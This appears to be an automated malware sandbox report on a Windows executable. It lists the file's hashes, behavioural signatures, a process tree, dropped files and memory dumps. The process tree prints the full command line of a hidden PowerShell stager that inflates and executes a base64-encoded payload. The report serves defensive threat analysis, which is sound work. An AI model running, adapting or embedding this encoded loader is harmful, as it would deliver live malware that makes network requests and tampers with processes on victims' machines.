df3325a608ac4d26e5787e4e529fb8cbcfeb74b47e2fce2061b729b34f9f33dd

General

Target

408478d998eaec8e33ff321cb7dbaa12.exe
Size

91KB
MD5

408478d998eaec8e33ff321cb7dbaa12
SHA1

4c69af6fc6eac5d63ee382f54a6cfdcae619d1aa
SHA256

df3325a608ac4d26e5787e4e529fb8cbcfeb74b47e2fce2061b729b34f9f33dd
SHA512

8fa034cbaa132501765805f00f07bccbe6426b72435324b2344b4102ec636a668e339aae40c4cf5c00ffa67bf460ebca552945feb5a64df58449e9fcafea869e
SSDEEP

1536:oY7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIf9wLEXO+:o2FfHgTWmCRkGbKGLeNTBf9x

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
38	3224	powershell.exe
39	3224	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3224	powershell.exe
3224	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3224	powershell.exe

Suspicious use of WriteProcessMemory 5 IoCs

description	pid	Process	procid_target
PID 4492 wrote to memory of 4776	4492	408478d998eaec8e33ff321cb7dbaa12.exe	92
PID 4492 wrote to memory of 4776	4492	408478d998eaec8e33ff321cb7dbaa12.exe	92
PID 4776 wrote to memory of 3224	4776	cmd.exe	93
PID 4776 wrote to memory of 3224	4776	cmd.exe	93
PID 4776 wrote to memory of 3224	4776	cmd.exe	93

C:\Users\Admin\AppData\Local\Temp\408478d998eaec8e33ff321cb7dbaa12.exe
"C:\Users\Admin\AppData\Local\Temp\408478d998eaec8e33ff321cb7dbaa12.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4492
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\9422.tmp\9423.tmp\9424.bat C:\Users\Admin\AppData\Local\Temp\408478d998eaec8e33ff321cb7dbaa12.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4776
- - C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
    C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZNb9s4EL3rVxCGgEi1JFC2Y7gRDDRpNt1gt25Qu92D4IMijW1uaFIgqcRK1v+9o1j+kJMtgh4WCx0oD9/MPM08Dm2nZEg+tKz4kvPrZS6VcVp3oATwbifIOG+5U5IXt5ylRJvE4AIrg/vkWpgbo8h3pkyR8HPOZerUtgePFEwYsqrXsl4f3eiX83xUkBiYLHDJtnmKOu69R/aZ67eD3LWlyt76YMUXpYF4OrVHk5uJSoReMjP0wne9QXRoiul0SFfhRbTDa0ilyI5dmtadly3keZqC1kN7lnAN0USVT/ZYpndghiN48L/c/g2pISMwwcaq69WJD23nWaYwylWyZLycnp3ht4BCwINUd1780ntS5oCwy7lKls39GyWNTCWvEd+y3I1qQsFHKQSycU4KHeRS8kCYPJBqfuKFna4bxd8ly6Zb8BhE5hyW6hjwFVJg99DErNPEpIung7oYVcA6slUhJtIkfEijK6l+S9KFY1+LDFaECdLoSI8GQa87dZ/2Pru3d53TfnvjhzFnTGkzYUsYOge1vqwEhEYnfE+pF+JDn594u/EHE1lVGpO6blX5z4xztmmwduJvWPt+b+rsc4aUUkSOnxHR2CTK+GMOkBNfE7ppOeavyvI/6nnN6I1N36I3XW+q/QVo1/lj3D4plxqcX1XD0WF7qyAsNiPOf6cE4pO9Aok/B0KJLxXZfa1LnixTiUPj7D2gNS61gWXwssPEiV/Z+6lOyGseDb2MDc7S5evAI+FM0ty1bL2XTPi+E4T9QdAJ+qcnHhnQAXXJP0QWxhcF5xGxc/y0+FyppGK2Gd7XAie7SMFp3eJIbXmk5yJwhUAMvZNOfhToEfepZZdviBdfMIMU70FhISraEkvS7WBMj7rt0ypbiRO6Cri6uLIeFowDcTCDz83PnbFjFZN2k2rp2Y/tU1TPv9f6iidzjdFGUoBL1tYMdeDYbBgiF4Z5gfSqt3YbMyA5m1XstuGOGH0CU91FKEC82PA+Cn5PRMbBRS8/nK4t26AvisKvukb8JSxvQV3CjAlmmMTjkxJ/lKAkW38x0e20iC/wl86TFMiz5aoQaYXUxM8Trc1CFVWD8HCenTXueerZZfAniLlZeHTVRfHj0qOutWX+tRAGxR88S1LmY1D3DJUffE6UXiS8aqHMy6qChGLfNjc0HqhVsC2763pklwTFZ7Zdr/8CVMfVXm3ObVMxjTlcn8hBv0dpPXTWa+sH\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3224

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9422.tmp\9423.tmp\9424.bat

Filesize
3KB

MD5
7517132b3e54d5936253a44f29f2eb96

SHA1
b3499fc0d3a7a91c2ea26a00045d4256ad078e55

SHA256
d3d770676ebeeb1a52f329c9235237dc49ecdd32a02e690ecd62191cb7949059

SHA512
f31b8dce3457b0ef606985c69a315c25a07e907d8b99ccd63e28ac393be5d0c3961c001e04b74d26dfbf9f5ebf150f071c2b1a9c73cc38af3f86b05deacef3ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_szx4vuy4.jij.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/3224-5-0x00000000058B0000-0x0000000005ED8000-memory.dmp

Filesize
6.2MB

Download
memory/3224-18-0x00000000061E0000-0x0000000006534000-memory.dmp

Filesize
3.3MB

Download
memory/3224-3-0x0000000005270000-0x0000000005280000-memory.dmp

Filesize
64KB

Download
memory/3224-6-0x0000000005830000-0x0000000005852000-memory.dmp

Filesize
136KB

Download
memory/3224-7-0x0000000005F50000-0x0000000005FB6000-memory.dmp

Filesize
408KB

Download
memory/3224-8-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/3224-2-0x0000000074A90000-0x0000000075240000-memory.dmp

Filesize
7.7MB

Download
memory/3224-4-0x0000000005200000-0x0000000005236000-memory.dmp

Filesize
216KB

Download
memory/3224-19-0x00000000067D0000-0x00000000067EE000-memory.dmp

Filesize
120KB

Download
memory/3224-20-0x0000000006820000-0x000000000686C000-memory.dmp

Filesize
304KB

Download
memory/3224-21-0x0000000005270000-0x0000000005280000-memory.dmp

Filesize
64KB

Download
memory/3224-22-0x0000000008130000-0x00000000087AA000-memory.dmp

Filesize
6.5MB

Download
memory/3224-23-0x0000000006D20000-0x0000000006D3A000-memory.dmp

Filesize
104KB

Download
memory/3224-24-0x0000000074A90000-0x0000000075240000-memory.dmp

Filesize
7.7MB

Download
memory/3224-25-0x0000000005270000-0x0000000005280000-memory.dmp

Filesize
64KB

Download
memory/3224-29-0x0000000074A90000-0x0000000075240000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing